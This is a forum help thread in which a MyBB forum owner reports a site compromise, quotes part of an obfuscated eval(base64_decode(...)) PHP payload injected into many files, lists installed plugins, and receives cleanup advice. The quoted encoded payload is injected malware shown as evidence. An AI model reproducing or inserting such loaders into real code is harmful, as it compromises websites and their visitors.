Hi all.
I have
www.windows7forum.pl forum, today I haved atack and to many php files, was added bad code.
Quote:eval(base64_decode('aWYoIWlzc2V0KCRtOTVpMSkpe2Z1bmN0aW9uIG05NWkoJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgk
YVswXSBhcyAkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKF
xbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3Jp
Now is good, but I must many files edited and cut code.
What happen? I have new version of MyBB. I changed passwords.
Can You propose, what I must do else?
Greetings and sorry - my english
What version of MyBB exactly?
That's usually from RFI. Is your site a pure forum or do you run other software? Can you list all your plugins please?
And is this a reliable shared host? A poorly configured shared hosting environment would allow other accounts to alter yours.
labrocca what's a RFI?
I have html in threads on. Today I scanned with NOD my system and I have still 390 infected files on PC. I can't this delete, NOD too.
Forum works but.. very slow! When I open a forum and threads I see, he connecting with porn site ulust.com, traffic-shaders.com and others. This site slow my forum down.
What now?
Help guys.
I have still bad code?
My plugins list:
Ads after first post (2.2)
Displays ads after the posts in your forums.
Autor MyBBoard.de Aktywuj
Antyspam Akismet (1.2.1)
Unikaj spamu na swoim forum przy pomocy narzędzia Akismet.
Autor MyBB Group Zainstaluj i aktywuj
Dynamic Metas (1.1)
Adds dynamic meta field (keywords and description) to MyBB pages
Autor CrazyCat Dezaktywuj
Hello World! (1.0)
A sample plugin that prints hello world and prepends the content of each post to 'Hello world!'
Autor MyBB Group Aktywuj
Image Resizer & Optimizer with GD (1.1)
Resizes and optimizes an image if the width or filesize is larger than a maximum width given through the settings panel.
Autor MT Jordan Dezaktywuj
(1.2.3)
Autor Garlant Dezaktywuj Odinstaluj
Extra Moderator Permissons (1.2)
A plugin that provides extra control on Moderators.
Autor Tomm M Dezaktywuj Odinstaluj
Multiple reputations (2.0)
Autor CraKteR Dezaktywuj
News Bar (1.1.4)
This plugin adds the well known "Latest News Bar" from MyBBoard.net to your forum.
Autor Phenomenon Dezaktywuj Odinstaluj
Resend Activation Code (2.0)
Allows the administrators/super moderators to send the activation code mail from User CP.
Autor Albin Joseph Zainstaluj i aktywuj
SEO Links! (1.1 Beta 1)
A plugin that does the SEO for links.
Autor Asad Khan Dezaktywuj
SpiceFuse Shoutbox (1.1 Beta 1)
An elegant, fast, and resource friendly AJAX shoutbox.
Autor Asad Khan Dezaktywuj
ThankYou (3.0.7)
Add a thank you note to a certain post.
Autor Arash_j13
Update: Hamid Nozari
Upgrade: AmirH Hassaneini,Hamed Arfaee Dezaktywuj
videolink (0.1)
Add the posibility to embed videos from 130+ sites
Autor thor2705
(2009-10-13, 03:57 PM)Anmato Wrote: [ -> ]I have html in threads on.
That probably didn't help.
Reupload all your files and go through every edited template and make sure there's no malicious code in any of them.